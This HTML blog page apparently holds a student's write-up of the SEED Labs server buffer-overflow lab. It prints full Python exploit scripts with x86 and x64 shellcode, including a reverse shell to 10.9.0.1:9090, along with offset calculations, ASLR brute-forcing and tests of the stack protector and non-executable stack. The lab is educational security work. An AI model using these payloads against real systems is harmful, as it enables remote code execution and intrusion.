<!DOCTYPE html>
<html>
	<head>
		
<title>SeedLabs2.0-Buffer Overflow Attack Lab(Server Version)-无限进步</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" type="image/x-icon" href="/image/shengdanwu.png">

<link rel="stylesheet" href="/css/index.css">



<meta name="keywords" content="Expoilt,栈溢出,">
<meta name="description" content="实验过程">


<script src="/js/jquery.min.js"></script>


<script src="/js/index.js"></script>


<script src="/js/fancybox.umd.js"></script>


<script src="/js/fancybox-images.js"></script>


<script src="/js/gitalk.min.js"></script>


<script src="/js/hljs.min.js"></script>
 
<script>hljs.highlightAll();</script>

	<meta name="generator" content="Hexo 8.1.1"></head>

	<body>
		
	<div class="header">
		<div class="header-top" id="header-top">
			<div class="h-left">
				<a href="/">
					<img src="/image/shengdanwu.png" alt="Quiet">
				</a>
			</div>
			<div class="h-right">
				<ul>
					
						
								<li>
									<a href="/">
										HOME
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/archives">
										ARCHIVE
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/categories">
										CATEGORIES
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/tags">
										TAGS
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/links">
										LINKS
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/about">
										ABOUT
									</a>
									<span class="dot"></span>
								</li>
								
									
				</ul>
			</div>
			<div class="h-right-close">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="24" height="24">
					<path fill="none" d="M0 0h24v24H0z" />
					<path d="M3 4h18v2H3V4zm0 7h18v2H3v-2zm0 7h18v2H3v-2z" fill="rgba(68,68,68,1)" />
				</svg>
			</div>
		</div>
	</div>
	<div class="sidebar">
    <div class="topo">
        <h2>Ram</h2>
    </div>
    <ul>
        
        <li>
            <a href="/">HOME</a>
        </li>
        
        <li>
            <a href="/archives">ARCHIVE</a>
        </li>
        
        <li>
            <a href="/categories">CATEGORIES</a>
        </li>
        
        <li>
            <a href="/tags">TAGS</a>
        </li>
        
        <li>
            <a href="/links">LINKS</a>
        </li>
        
        <li>
            <a href="/about">ABOUT</a>
        </li>
        
    </ul>
    <div class="my_foot">
        
        <a target="_blank" rel="noopener" href="https://github.com/RamBree">
            <img src="https://cdn.jsdelivr.net/gh/duogongneng/MyBlogImg/imggithub.png" alt="Quiet主题">
        </a>
        
    </div>
</div>
<div class='shelter'>
</div>
<style>
    .shelter{
        background-color: #333;
        opacity:0.5;
        cursor: pointer;
        display: none; 
        position: fixed;
        left: 0;
        top: 0; 
        right: 0;
        bottom: 0;
        z-index: 1998;
    }
    .sidebar {
        width: 66%;
        height: 100%;
        position: fixed;
        top: 0;
        right: -100%;
        bottom: 0;
        background: #fff;
        z-index: 1999;
        text-align: center;
        box-shadow: -6px 0 20px rgba(98, 94, 94, .815);
    }

    .topo {
        width: 100%;
        height: 200px;
        background: url(https://api.ixiaowai.cn/gqapi/gqapi.php) no-repeat;
        background-size: 100% 100%;
        position: relative;
        display: flex;
        align-items: flex-end
    }

    .topo h2 {
        color: #fff;
        z-index: 1;
        position: relative;
        margin: 0 0 10px 10px;
        font-size: 1.2em;
        box-sizing: border-box
    }

    .topo:before {
        content: '';
        background-image: url(/image/pattern.png);
        background-repeat: repeat;
        height: 100%;
        left: 0;
        position: absolute;
        top: 0;
        width: 100%;
        z-index: 1
    }

    .sidebar ul {
        width: 100%;
        margin-top: 50px
    }

    .sidebar ul li {
        height: 50px;
        list-style: none;
        font-size: 1.2em;
        text-align: right;
        margin-right: 10px
    }

    .sidebar ul li a {
        display: grid;
        color: #5d606a;
        text-overflow: ellipsis;
        width: 100%;
        text-decoration: none
    }

    .my_foot {
        width: 100%;
        padding: 10px;
        margin-bottom: 10px;
        position: absolute;
        bottom: 0
    }

    .my_foot a {
        text-decoration: none;
        margin-right: 10px;
        display: inline-block
    }

    .my_foot a img {
        width: 30px;
        height: 30px
    }
</style>

<script>
    $( function () {
	$( '.h-right-close>svg' )
		.click( function () {
			$( '.sidebar' )
				.animate( {
					right: "0"
				}, 500 );
			$( '.shelter' )
				.fadeIn( "slow" )
		} );
	$( '.shelter' )
		.click( function ( e ) {
			$( '.sidebar' )
				.animate( {
					right: "-100%"
				}, 500 );
			$( '.shelter' )
				.fadeOut( "slow" )
		} )
} )

</script>

<div class="post">
    <div class="post-header-background post-header-img"
    style="background: url('/image/demon-slayer-3840x2160-10716.jpg')" 
>
    <div class="post-header-background-content">
        <ul class="post-header-tag">
            
            
            <li><a href="/tags/Expoilt">Expoilt</a></li>
            
            <li><a href="/tags/栈溢出">栈溢出</a></li>
            
            
        </ul>
        
        <h1>SeedLabs2.0-Buffer Overflow Attack Lab(Server Version)</h1>
        <div class="post-header-info">
            <div class="post-header-info-author">
                
                    <svg t="1604839279282" class="icon" viewBox="0 0 1024 1024" version="1.1"
                        xmlns="http://www.w3.org/2000/svg" p-id="2901" width="20" height="20">
                        <path
                            d="M513 956.3c-247.7 0-448-200.3-448-448S265.3 66.2 513 66.2s448 200.3 448 448-200.3 442.1-448 442.1z m0-830.9c-212.2 0-388.8 170.7-388.8 388.8C124.2 726.3 294.9 903 513 903c212.2 0 388.8-170.7 388.8-388.8S725.2 125.4 513 125.4z m0 430.2c-94.2 0-170.7-76.5-170.7-170.7S418.8 207.8 513 207.8s170.7 76.5 170.7 170.7S607.2 555.6 513 555.6z m0-289.1c-64.6 0-112 52.8-112 112s47.4 117.9 112 117.9 112-52.8 112-112-47.4-117.9-112-117.9z m0 689.8c-135.7 0-259-58.7-341.9-158.9l-11.8-17.8 11.8-17.8c76.5-117.9 206.2-188.5 347.8-188.5 135.7 0 265 64.6 341.9 182.6l11.8 17.8-11.8 17.8C778 897.1 648.7 956.3 513 956.3zM230.3 773.2C300.9 849.7 406.9 897 513 897c112 0 218.1-47.4 288.6-129.8-70.5-88.2-170.7-135.6-282.7-135.6s-218.1 53.3-288.6 141.6z"
                            p-id="2902" fill="#ffffff"></path>
                    </svg>
                    
                <span class="post-header-info-author-text"> <a href="../../about">Ram</a></span>
                <div class="post-header-info-author-categories">
                    
                         <a href="../../categories/SeedLabs/" target="_blank" >SeedLabs</a>
                    
                </div>
                <p>2025-11-04 21:30:03</p>
            </div>
        </div>
    </div>
</div>
    <div class="post-content" id="content">
  
  <div id="article" class="post-content-info">
    

    <h1 id="Buffer-Overflow-Attack-Lab-Server-Version"><a href="#Buffer-Overflow-Attack-Lab-Server-Version" class="headerlink" title="Buffer Overflow Attack Lab(Server Version)"></a>Buffer Overflow Attack Lab(Server Version)</h1><blockquote>
<p>完成人：冉文博	学号：202518018670055</p>
</blockquote>
<h2 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h2><p>修改server_code中的<code>Makefile</code>,设置L1为122。对应上课日期10.22</p>
<img src="./assets/image-20251022101646517.png" alt="image-20251022101646517" style="zoom: 25%;" />

<p>在server-code编译代码。相当于服务器上执行了这些32位或者64位程序。但是作为一个攻击者，应该是不能获取这些信息的。</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">make<br>make install<br></code></pre></td></tr></table></figure>

<p><img src="/./assets/image-20251022101936052.png" alt="image-20251022101936052"></p>
<p>启动docker。（原来的Ubuntu24.04没有成功，后面换了seedlab预构建的虚拟机就可以了）</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> docker-compose build<br><span class="hljs-built_in">sudo</span> docker-compose up<br></code></pre></td></tr></table></figure>

<p><img src="/./assets/image-20251022192424957.png" alt="image-20251022192424957"></p>
<p>关闭保护措施，方便后续的攻击。</p>
<p><img src="/./assets/image-20251022191616492.png" alt="image-20251022191616492"></p>
<h2 id="Task-1-Get-Familiar-with-the-Shellcode"><a href="#Task-1-Get-Familiar-with-the-Shellcode" class="headerlink" title="Task 1: Get Familiar with the Shellcode"></a>Task 1: Get Familiar with the Shellcode</h2><p>里面有两个 Python 程序:shellcode_32.py 和 shellcode_64.py，分别用于 32 位和 64 位 Shellcode。这两个 Python 程序将把二进制 Shellcode 写入 codefile_32 和 codefile_64 中。然后，您可以使用 call_shellcode 来执行其中的 Shellcode。</p>
<p>32位的shellcode如图所示。</p>
<img src="./assets/image-20251022201953789.png" alt="image-20251022201953789" style="zoom: 25%;" />

<p>可以通过<code>call_shellcode</code>来执行shellcode。</p>
<img src="./assets/image-20251022200224434.png" alt="image-20251022200224434" style="zoom:67%;" />

<h2 id="Task-2-Level-1-Attack"><a href="#Task-2-Level-1-Attack" class="headerlink" title="Task 2: Level-1 Attack"></a>Task 2: Level-1 Attack</h2><p>向服务器发送测试信息。可以观察服务器返回的信息。同样可以通过这种方式发送我们的shellcode。</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> hello | nc 10.9.0.5 9090<br></code></pre></td></tr></table></figure>

<p><img src="/./assets/image-20251022201212184.png" alt="image-20251022201212184"></p>
<p><img src="/./assets/image-20251022201322719.png" alt="image-20251022201322719"></p>
<p>可以看到ebp的值为 0xffffd528, buffer的地址起点为 0xffffd4ac。</p>
<p>首先观察exploit.py的payload结构，将buffer全部填冲为<strong>nop</strong>，<code>start</code>为shellcode的起点，<code>ret</code>是新的返回地址，<code>offset</code>是buffer地址距离返回地址的偏移。</p>
<p>所以<code>offset=0xffffd528 - 0xffffd4ac + 4</code>。</p>
<p><code>ret</code>由于我们中间填充了<strong>nop</strong>,所以只要比之前的<code>return address</code>大，shellcode之前就行。之前的<code>return address= 0xffffd528+4。</code>       <code>start</code>在<code>ret</code>上或后面就行。</p>
<p>所以<code>export.py</code>代码如下</p>
<figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">import</span> sys<br><br>shellcode = (<br>   <span class="hljs-string">&quot;\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b&quot;</span><br>   <span class="hljs-string">&quot;\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54&quot;</span><br>   <span class="hljs-string">&quot;\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff&quot;</span><br>   <span class="hljs-string">&quot;/bin/bash*&quot;</span><br>   <span class="hljs-string">&quot;-c*&quot;</span><br>   <span class="hljs-comment"># The * in this line serves as the position marker         *</span><br>   <span class="hljs-string">&quot;/bin/ls -l; echo Hello 32; /bin/tail -n 2 /etc/passwd     *&quot;</span><br>   <span class="hljs-string">&quot;AAAA&quot;</span>   <span class="hljs-comment"># Placeholder for argv[0] --&gt; &quot;/bin/bash&quot;</span><br>   <span class="hljs-string">&quot;BBBB&quot;</span>   <span class="hljs-comment"># Placeholder for argv[1] --&gt; &quot;-c&quot;</span><br>   <span class="hljs-string">&quot;CCCC&quot;</span>   <span class="hljs-comment"># Placeholder for argv[2] --&gt; the command string</span><br>   <span class="hljs-string">&quot;DDDD&quot;</span>   <span class="hljs-comment"># Placeholder for argv[3] --&gt; NULL</span><br>).encode(<span class="hljs-string">&#x27;latin-1&#x27;</span>)<br><br>content = <span class="hljs-built_in">bytearray</span>(<span class="hljs-number">0x90</span> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">517</span>)) <br>start = <span class="hljs-number">250</span>           <br>content[start:start + <span class="hljs-built_in">len</span>(shellcode)] = shellcode<br>ret    = <span class="hljs-number">0xffffd528</span> + <span class="hljs-number">8</span>  <br>offset = <span class="hljs-number">0xffffd528</span> - <span class="hljs-number">0xffffd4ac</span> + <span class="hljs-number">4</span>        <br>content[offset:offset + <span class="hljs-number">4</span>] = (ret).to_bytes(<span class="hljs-number">4</span>,byteorder=<span class="hljs-string">&#x27;little&#x27;</span>) <br><br><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;badfile&#x27;</span>, <span class="hljs-string">&#x27;wb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>  f.write(content)<br><br></code></pre></td></tr></table></figure>

<p>可以看见成功执行了我们的shellcode。</p>
<p><img src="/./assets/image-20251022203738897.png" alt="image-20251022203738897"></p>
<p>当然也可以反弹shell。我们修改shellcode片段如下。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">shellcode = (<br>   <span class="hljs-string">&quot;\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b&quot;</span><br>   <span class="hljs-string">&quot;\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54&quot;</span><br>   <span class="hljs-string">&quot;\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff&quot;</span><br>   <span class="hljs-string">&quot;/bin/bash*&quot;</span><br>   <span class="hljs-string">&quot;-c*&quot;</span><br>   <span class="hljs-comment"># The * in this line serves as the position marker         *</span><br>   <span class="hljs-string">&quot;/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1           *&quot;</span><br>   <span class="hljs-string">&quot;AAAA&quot;</span>   <span class="hljs-comment"># Placeholder for argv[0] --&gt; &quot;/bin/bash&quot;</span><br>   <span class="hljs-string">&quot;BBBB&quot;</span>   <span class="hljs-comment"># Placeholder for argv[1] --&gt; &quot;-c&quot;</span><br>   <span class="hljs-string">&quot;CCCC&quot;</span>   <span class="hljs-comment"># Placeholder for argv[2] --&gt; the command string</span><br>   <span class="hljs-string">&quot;DDDD&quot;</span>   <span class="hljs-comment"># Placeholder for argv[3] --&gt; NULL</span><br>).encode(<span class="hljs-string">&#x27;latin-1&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>同时监听9090端口就可以查看反弹回来的shell。</p>
<img src="./assets/image-20251022205015627.png" alt="image-20251022205015627" style="zoom:67%;" />

<p>在后面的三个任务中，我都采用返回现实passwd的方法，来判断是否攻击成功。</p>
<h2 id="Task-3-Level-2-Attack"><a href="#Task-3-Level-2-Attack" class="headerlink" title="Task 3: Level-2 Attack"></a>Task 3: Level-2 Attack</h2><p>发送一个Hello到任务二的服务器</p>
<p><img src="/./assets/image-20251022205252189.png" alt="image-20251022205252189"></p>
<p>任务二的信息更少，只有Buffer的地址信息。另一个对您可能有用的事实是，由于内存对齐的原因， 在 32 位程序中帧指针的值总是 4 的倍数，在 64 位程序中则是 8 的倍数。然后告诉我缓冲区的大小是100到200。</p>
<p>只需要将buffer把缓冲区全部都覆盖为返回地址，再进行跳转即可。start大于前面的ret即可。但是start不能太大，不然shellcode写不下。</p>
<figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">content = <span class="hljs-built_in">bytearray</span>(<span class="hljs-number">0x90</span> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">517</span>)) <br>start = <span class="hljs-number">300</span>            <br>content[start:start + <span class="hljs-built_in">len</span>(shellcode)] = shellcode<br>ret    = <span class="hljs-number">0xffffd468</span> + <span class="hljs-number">248</span><br><span class="hljs-comment"># offset = 240</span><br><span class="hljs-keyword">for</span> offset <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-number">240</span>, <span class="hljs-number">4</span>):<br>   content[offset:offset + <span class="hljs-number">4</span>] = (ret).to_bytes(<span class="hljs-number">4</span>,byteorder=<span class="hljs-string">&#x27;little&#x27;</span>) <br></code></pre></td></tr></table></figure>

<p><img src="/./assets/image-20251022210826424.png" alt="image-20251022210826424"></p>
<h2 id="Task-4-Level-3-Attack"><a href="#Task-4-Level-3-Attack" class="headerlink" title="Task 4: Level-3 Attack"></a>Task 4: Level-3 Attack</h2><p><img src="/./assets/image-20251022220512104.png" alt="image-20251022220512104"></p>
<p>与 32 位机器上的缓冲区溢出攻击相比，64 位机器上的攻击更加困难。尽管x64 体系结构支持 64 位地址空间，但只允许从 0x00 到 0x00007fffffff 的地址。这意味着对于每个地址（8 字节），最高的两个字节总是零。这会引发问题。在缓冲区溢出攻击中，我们需要使用strcpy 将 content 复制到堆栈中。strcpy 函数在遇到 0 时会终止。因此，如果在 content 中间出现 0，则在 0 之后的内容都不能被复制到堆栈中。</p>
<p>在存储ret 值的时候， 使用的是小端方式：“0x00007fffffffdfd0”是以“\xd0\xdf\xff\xff\0xff\0x7f\0x00\0x00”的形式存储的, 而之前的ret address最后两位也是\0x00\0x00，所以可以服用之前的地址。而且要保证覆盖后的ret其他字节也没有\0x00。因为ret后面不能写入任何信息，所以需要把shellcode写在前面。</p>
<p>ret&#x3D;0x00007fffffffe0f0</p>
<p>offset&#x3D;0x00007fffffffe1c0 - 0x00007fffffffe0f0 + 8</p>
<p>start &#x3D; 0</p>
<figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python3</span><br><span class="hljs-keyword">import</span> sys<br><br>shellcode = (<br>   <span class="hljs-string">&quot;\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48&quot;</span><br>   <span class="hljs-string">&quot;\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48&quot;</span><br>   <span class="hljs-string">&quot;\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31&quot;</span><br>   <span class="hljs-string">&quot;\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff&quot;</span><br>   <span class="hljs-string">&quot;/bin/bash*&quot;</span><br>   <span class="hljs-string">&quot;-c*&quot;</span><br>   <span class="hljs-comment"># The * in this line serves as the position marker         * </span><br>   <span class="hljs-comment">#&quot;/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1.          *&quot;</span><br>   <span class="hljs-string">&quot;/bin/ls -l; echo Hello 64; /bin/tail -n 4 /etc/passwd     *&quot;</span><br>   <span class="hljs-string">&quot;AAAAAAAA&quot;</span>   <span class="hljs-comment"># Placeholder for argv[0] --&gt; &quot;/bin/bash&quot;</span><br>   <span class="hljs-string">&quot;BBBBBBBB&quot;</span>   <span class="hljs-comment"># Placeholder for argv[1] --&gt; &quot;-c&quot;</span><br>   <span class="hljs-string">&quot;CCCCCCCC&quot;</span>   <span class="hljs-comment"># Placeholder for argv[2] --&gt; the command string</span><br>   <span class="hljs-string">&quot;DDDDDDDD&quot;</span>   <span class="hljs-comment"># Placeholder for argv[3] --&gt; NULL</span><br>).encode(<span class="hljs-string">&#x27;latin-1&#x27;</span>)<br><br>content = <span class="hljs-built_in">bytearray</span>(<span class="hljs-number">0x90</span> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">517</span>)) <br>start = <span class="hljs-number">0</span>        <br>content[start:start + <span class="hljs-built_in">len</span>(shellcode)] = shellcode<br><br>ret=<span class="hljs-number">0x00007fffffffe0f0</span><br>offset=<span class="hljs-number">0x00007fffffffe1c0</span> - <span class="hljs-number">0x00007fffffffe0f0</span> + <span class="hljs-number">8</span><br>content[offset: offset + <span class="hljs-number">8</span>] = (ret).to_bytes(<span class="hljs-number">8</span>, byteorder=<span class="hljs-string">&#x27;little&#x27;</span>)<br><br><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;badfile&#x27;</span>, <span class="hljs-string">&#x27;wb&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>  f.write(content)<br><br></code></pre></td></tr></table></figure>

<p><img src="/./assets/image-20251022223635528.png" alt="image-20251022223635528"></p>
<h2 id="Task-5-Level-4-Attack"><a href="#Task-5-Level-4-Attack" class="headerlink" title="Task 5: Level-4 Attack"></a>Task 5: Level-4 Attack</h2><p><img src="/./assets/image-20251022224220604.png" alt="image-20251022224220604"></p>
<p>可见现在缓冲区小了很多，如果采用任务四的方法，则会因为无法输入完整shellcode无法成功。</p>
<p>把返回地址增加到ebp+1200就可以了。<em>这里我也不知道为什么。我猜测是因为在main函数输入了buffer，然后在函数内strcpy的时候被截断了，然后就直接返回到main函数中，返回地址刚好命中shellcode，就在main函数中执行了我们的shellcode</em></p>
<blockquote>
<p><strong>课程补充</strong></p>
<p>审计stack.c源代码</p>
<p>badfile是从main()出来的，bof()是攻击函数。</p>
<p>数据流：main() -&gt; dummy_function(char *str) (中间填充了1000个字节) -&gt;bof(char *str)</p>
<figure class="highlight c"><table><tr><td class="code"><pre><code class="hljs c"><span class="hljs-type">void</span> <span class="hljs-title function_">dummy_function</span><span class="hljs-params">(<span class="hljs-type">char</span> *str)</span><br>&#123;<br>    <span class="hljs-type">char</span> dummy_buffer[<span class="hljs-number">1000</span>];<br>    <span class="hljs-built_in">memset</span>(dummy_buffer, <span class="hljs-number">0</span>, <span class="hljs-number">1000</span>);<br>    bof(str);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>所以这个返回地址就是返回到main()函数中，在main()执行我们的shellcode，因为中间有1000个字节的填充，所以可以估计这个返回地址大概会加1000多，多次尝试可以估计。</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="code"><pre><code class="hljs python">content = <span class="hljs-built_in">bytearray</span>(<span class="hljs-number">0x90</span> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">517</span>)) <br>start = <span class="hljs-number">0</span>        <br>content[<span class="hljs-number">517</span>-<span class="hljs-built_in">len</span>(shellcode): <span class="hljs-number">517</span>] = shellcode<br><br>ret= <span class="hljs-number">0x00007fffffffe1c0</span> + <span class="hljs-number">1200</span><br>offset=<span class="hljs-number">0x00007fffffffe1c0</span> - <span class="hljs-number">0x00007fffffffe160</span> + <span class="hljs-number">8</span><br>content[offset: offset + <span class="hljs-number">8</span>] = (ret).to_bytes(<span class="hljs-number">8</span>, byteorder=<span class="hljs-string">&#x27;little&#x27;</span>)<br><br></code></pre></td></tr></table></figure>

<p><img src="/./assets/image-20251022232013088.png" alt="image-20251022232013088"></p>
<h2 id="Task-6-Experimenting-with-the-Address-Randomization"><a href="#Task-6-Experimenting-with-the-Address-Randomization" class="headerlink" title="Task 6: Experimenting with the Address Randomization"></a>Task 6: Experimenting with the Address Randomization</h2><p>开启地址随机化。</p>
<p><img src="/./assets/image-20251022233916902.png" alt="image-20251022233916902"></p>
<p>发送两个hello到服务器，可以看见每次地址都不一样。</p>
<img src="./assets/image-20251022234030211.png" alt="image-20251022234030211"  />

<p>暴力求解。使用 Task2 中 reverse shell 的 <code>exploit.py</code> 代码，执行命令</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><code class="hljs bash">./brute-force.sh<br></code></pre></td></tr></table></figure>

<p><img src="/./assets/image-20251022235731441.png" alt="image-20251022235731441"></p>
<p>运气很差。。。运行了接近13分钟才获取到了shell。</p>
<h2 id="Tasks-7-Experimenting-with-Other-Countermeasures"><a href="#Tasks-7-Experimenting-with-Other-Countermeasures" class="headerlink" title="Tasks 7: Experimenting with Other Countermeasures"></a>Tasks 7: Experimenting with Other Countermeasures</h2><h3 id="栈保护"><a href="#栈保护" class="headerlink" title="栈保护"></a>栈保护</h3><p>编辑 <code>Makefile</code> ，去除 <code>-fno-stack-protector</code> 选项，重新编译生成可执行文件。</p>
<p><img src="/./assets/image-20251023000011883.png" alt="image-20251023000011883"></p>
<p>重新编译后，将badfile输入到程序中。发现程序检测到了攻击。</p>
<p><img src="/./assets/image-20251023000203667.png" alt="image-20251023000203667"></p>
<h3 id="栈可执行"><a href="#栈可执行" class="headerlink" title="栈可执行"></a><strong>栈可执行</strong></h3><p>进入Makefile将<code>-z execstack</code>删除</p>
<p><img src="/./assets/image-20251023000451641.png" alt="image-20251023000451641"></p>
<p>可以看见开启这个保护之后，之前的shellcode都无法执行。</p>
<p><img src="/./assets/image-20251023000830113.png" alt="image-20251023000830113"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>通过这个实验了解了栈溢出攻击和栈相关的保护。本次栈溢出的利用方式主要是通过shellcode，即ret2shellcode，shellcode的编写也是很重要的一环，要比较熟悉汇编代码，本次实验虽然没有具体让我们自己设计，可以在未来继续学习。栈溢出的原理并不难，算是入门级别的二进制漏洞。</p>

  </div>
  <div id=""></div>
</div>

<script>
  
Fancybox.bind('[data-fancybox="fancybox-gallery-img"]', {
  dragToClose: true,
  Toolbar: true,
  closeButton: "top",
  Image: {
    zoom: true,
  },
  on: {
    initCarousel: (fancybox) => {
      const slide = fancybox.Carousel.slides[fancybox.Carousel.page];
      fancybox.$container.style.setProperty(
        "--bg-image",
        `url("${slide.$thumb.src}")`
      );
    },
    "Carousel.change": (fancybox, carousel, to, from) => {
      const slide = carousel.slides[to];
      fancybox.$container.style.setProperty(
        "--bg-image",
        `url("${slide.$thumb.src}")`
      );
    },
  },
});
</script>

<style>
    #noneimg img {
        display: none;
        z-index: 9999;
        /* width: 600px !important; */
        min-width: 0%;
        max-width: 90%;
        max-height: 80%;
        border-radius: 0px;
        position: fixed;
        box-shadow: 0 0 0px #c3c3c300 !important;
        left: 0;
        top: 0;
        right: 0;
        bottom: 0;
        margin: auto !important;
    }

    @media screen and (max-width:600px) {
        #noneimg img {
            max-width: 88%
        }
    }
</style>

    <div class="post-paging">
    

    
    <a href="/2025/11/04/hello-world/">
        <div class="post-paging-next">
            <span>下一篇</span>
            <p>Hello</p>
        </div>
    </a>
    
</div>
</div>
		
<div class="footer">
	<div class="Copyright">
		©2025 By Ram. 主题：<a
			style="text-decoration: none;display: contents; color: #898F9F;"
			target="_blank" rel="noopener" href="https://github.com/79e/hexo-theme-quiet">Quiet</a>
	</div>
	<div class="contact">
		
		<a target="_blank" rel="noopener" href="https://github.com/RamBree">
			<img src="https://cdn.jsdelivr.net/gh/duogongneng/MyBlogImg/imggithub.png" alt="Quiet主题">
		</a>
		
	</div>
</div>

<script src="/js/gotop.js"></script>


<style type="text/css">
    @media screen and (min-width: 600px) {
        .goTop>span {
            display: flex;
            align-items: center;
            justify-content: center;
            border-radius: 10px;
            width: 40px;
            height: 40px;
            cursor: pointer;
            opacity: 0.8;
            background: rgba(18, 24, 58, 0.06);
            text-align: center;
            transition: border .5s;
            border: 1px solid rgba(18, 24, 58, 0.06);

            -moz-transition: border .5s;
            /* Firefox 4 */
            -webkit-transition: border .5s;
            /* Safari 和 Chrome */
            -o-transition: border .5s;
            /* Opera */
        }

        .goTop>span:hover {
            border: 1px solid #6680B3;
        }


        .goTop {
            position: fixed;
            right: 30px;
            bottom: 80px;
        }

        .goTop>span>svg {
            width: 20px;
            height: 20px;
            opacity: 0.7;
        }

    }

    @media screen and (max-width: 600px) {
        .goTop {
            display: none;
        }
    }
</style>
<div class="goTop" id="js-go_top">
    <span>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
            <g>
                <path d="M13 12v8h-2v-8H4l8-8 8 8z"></path>
            </g>
        </svg>
    </span>
</div>
<script>
    $( '#js-go_top' )
	.gotoTop( {
		offset: 500,
		speed: 300,
		animationShow: {
			'transform': 'translate(0,0)',
			'transition': 'transform .5s ease-in-out'
		},
		animationHide: {
			'transform': 'translate(100px,0)',
			'transition': 'transform .5s ease-in-out'
		}
	} );
</script>


    <!-- Gitalk -->
    <script>
        const data = '{"clientID":"02b3c","clientSecret":"adfc7b4","repo":"gimment","owner":"duneng","admin":"duneng"}'
        const gitalk = new Gitalk({
            ...JSON.parse( data),
            id:location.pathname,
            distractionFreeMode:false
        })
        
        if(Boolean('false')){
            gitalk.render('gitalk-container')
        }
    </script>

<script>
	console.log('\n %c Hexo-Quiet 主题 %c https://github.com/79e/hexo-theme-quiet \n', 'color: #fadfa3; background: #030307; padding:5px 0;', 'background: #fadfa3; padding:5px 0;')
</script>
	</body>
</html>

